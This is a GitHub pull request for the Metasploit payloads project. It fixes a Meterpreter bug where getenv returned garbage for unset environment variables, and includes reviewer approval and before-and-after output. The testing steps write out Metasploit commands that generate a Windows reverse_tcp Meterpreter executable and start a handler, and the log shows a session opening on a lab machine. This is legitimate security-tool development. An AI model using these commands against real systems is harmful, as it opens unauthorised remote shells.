Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix bug where env lookups not found return garbage #662

Merged
merged 2 commits into from
Jun 20, 2023
Merged

fix bug where env lookups not found return garbage #662

merged 2 commits into from
Jun 20, 2023

Conversation

zgoldman-r7
Copy link
Contributor

@zgoldman-r7 zgoldman-r7 commented Jun 15, 2023
edited
Loading

This fixes a bug in framework where looking up an environment variable that doesn't exist doesn't cause an error, and instead returns unintelligible nonsense.

Tested on Windows 2016 Server VM, mac host machine

Setup:

msf6 > use windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set LHOST 192.168.2.1
LHOST => 192.168.2.1
msf6 payload(windows/meterpreter/reverse_tcp) > set meterpreterdebugbuild true
meterpreterdebugbuild => true
msf6 payload(windows/meterpreter/reverse_tcp) > generate -f exe -o shell.exe
[*] Writing 73802 bytes to shell.exe...
msf6 payload(windows/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.2.1:4444 
msf6 payload(windows/meterpreter/reverse_tcp) > WARNING: Local file /Users/zgoldman/Documents/R7Code/metasploit-framework/data/meterpreter/metsrv.x86.debug.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (240718 bytes) to 192.168.2.132
WARNING: Local file /Users/zgoldman/Documents/R7Code/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.debug.dll is being used
WARNING: Local file /Users/zgoldman/Documents/R7Code/metasploit-framework/data/meterpreter/ext_server_priv.x86.debug.dll is being used
[*] Meterpreter session 1 opened (192.168.2.1:4444 -> 192.168.2.132:49723) at 2023-06-15 13:15:46 -0500
sessions -i -1
[*] Starting interaction with 1...

Before:

meterpreter > getenv FOOBAR

Environment Variables
=====================

Variable  Value
--------  -----
FOOBAR    �����������������������������������������������������S���������������������������������������������������

meterpreter >

After:

meterpreter > getenv FOOBAR
[-] None of the specified environment variables were found/set.

@zgoldman-r7 zgoldman-r7 force-pushed the fix-env-variable-lookup-not-found branch from 928f94f to a40026e Compare June 15, 2023 21:22
@zgoldman-r7 zgoldman-r7 marked this pull request as ready for review June 15, 2023 21:32
@zgoldman-r7 zgoldman-r7 force-pushed the fix-env-variable-lookup-not-found branch from a40026e to 670fd69 Compare June 15, 2023 21:33
@zgoldman-r7 @adfoster-r7
Remove unnecessary second error check in env variable lookup
f193fe4 
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
@smcintyre-r7 smcintyre-r7 self-assigned this Jun 20, 2023
smcintyre-r7
smcintyre-r7 approved these changes Jun 20, 2023
View reviewed changes
Copy link
Contributor

@smcintyre-r7 smcintyre-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Changes look good to me. Thanks for fixing this @zgoldman-r7

meterpreter > getenv DOESNOTEXIST
[-] None of the specified environment variables were found/set.
meterpreter > getenv USERNAME

Environment Variables
=====================

Variable  Value
--------  -----
USERNAME  DC$

meterpreter >

@smcintyre-r7 smcintyre-r7 merged commit 0404af9 into rapid7:master Jun 20, 2023
3 checks passed
zeroSteiner added a commit to zeroSteiner/metasploit-framework that referenced this pull request Jun 20, 2023
@zeroSteiner
Update metasploit-payloads gem to 2.0.143
5d96b23 
Includes changes from:
* rapid7/metasploit-payloads#662
* rapid7/metasploit-payloads#660
@zeroSteiner zeroSteiner mentioned this pull request Jun 20, 2023
Merged
sempervictus pushed a commit to sempervictus/metasploit-framework that referenced this pull request Aug 1, 2023
@zeroSteiner
Update metasploit-payloads gem to 2.0.143
57a47ba 
Includes changes from:
* rapid7/metasploit-payloads#662
* rapid7/metasploit-payloads#660
JustAnda7 pushed a commit to JustAnda7/metasploit-framework that referenced this pull request Sep 20, 2023
@zeroSteiner @JustAnda7
Update metasploit-payloads gem to 2.0.143
db2485d 
Includes changes from:
* rapid7/metasploit-payloads#662
* rapid7/metasploit-payloads#660
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@adfoster-r7 adfoster-r7 adfoster-r7 left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
bug windows
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

get_env("TEMP") gives wrong results
3 participants
@zgoldman-r7 @smcintyre-r7 @adfoster-r7